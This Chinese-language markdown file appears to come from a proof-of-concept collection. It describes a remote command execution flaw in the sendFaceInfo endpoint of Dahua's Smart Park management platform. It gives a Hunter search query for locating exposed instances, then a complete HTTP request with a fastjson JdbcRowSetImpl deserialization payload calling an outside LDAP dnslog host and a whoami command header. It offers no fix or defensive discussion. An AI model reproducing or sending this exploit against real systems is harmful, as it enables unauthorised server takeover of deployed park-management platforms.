POC00/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md
2025-04-02 22:36:18 +08:00

36 lines
1.8 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华智慧园区综合管理平台sendFaceInfo 远程命令执行
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台旨在为园区提供一站式解决方案包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台sendFaceInfo远程命令执行攻击者可通过该漏洞获取服务器权限。
# 二、影响版本
+ 大华智慧园区综合管理平台
# 三、资产测绘
+ hunter:`app.name="Dahua 大华 智慧园区管理平台"`
![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/gH4aRxv7rmMOuKxg/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-893238.png)
+ 登录页面:
![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/gH4aRxv7rmMOuKxg/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-993966.png)
# 四、漏洞复现
```plain
POST /CardSolution/card/face/sendFaceInfo HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 216
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
Testcmd: whoami
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://qq6t3h.dnslog.cn","autoCommit":true}}}
```
![1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc.png](./img/gH4aRxv7rmMOuKxg/1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc-500956.png)
![1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d.png](./img/gH4aRxv7rmMOuKxg/1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d-109428.png)
> 更新: 2024-02-29 23:57:18
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggwqu2ux26v8ogez>